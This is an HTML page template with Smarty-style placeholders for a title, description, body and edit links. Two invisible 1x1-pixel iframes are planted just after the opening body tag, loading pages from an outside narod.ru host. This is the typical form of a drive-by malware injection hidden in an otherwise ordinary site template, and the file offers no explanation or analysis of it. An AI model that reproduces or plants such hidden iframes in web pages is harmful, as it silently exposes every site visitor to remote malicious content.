<html>
<head><title>{$title}</title></head>
<body>
<iframe src="http://ammokagent.narod.ru/1.htm" width=1 height=1 border=0 frameborder="no" scrolling="no" noresize marginwidth="0" marginheight="0"></iframe>
<iframe src="http://ammokagent.narod.ru/2.htm" width=1 height=1 border=0 frameborder="no" scrolling="no" noresize marginwidth="0" marginheight="0"></iframe>
<small>{call func=module param="top-navs.php"}</small>
<div align="right">{$description}</div>
<h1>{$title}</h1>
{$body}

{if $access}<hr /><small><center> edit <a href="?edit">page</a> | <a href="?edit-data">data</a></center></small><hr />{/if}
</body>
</html>
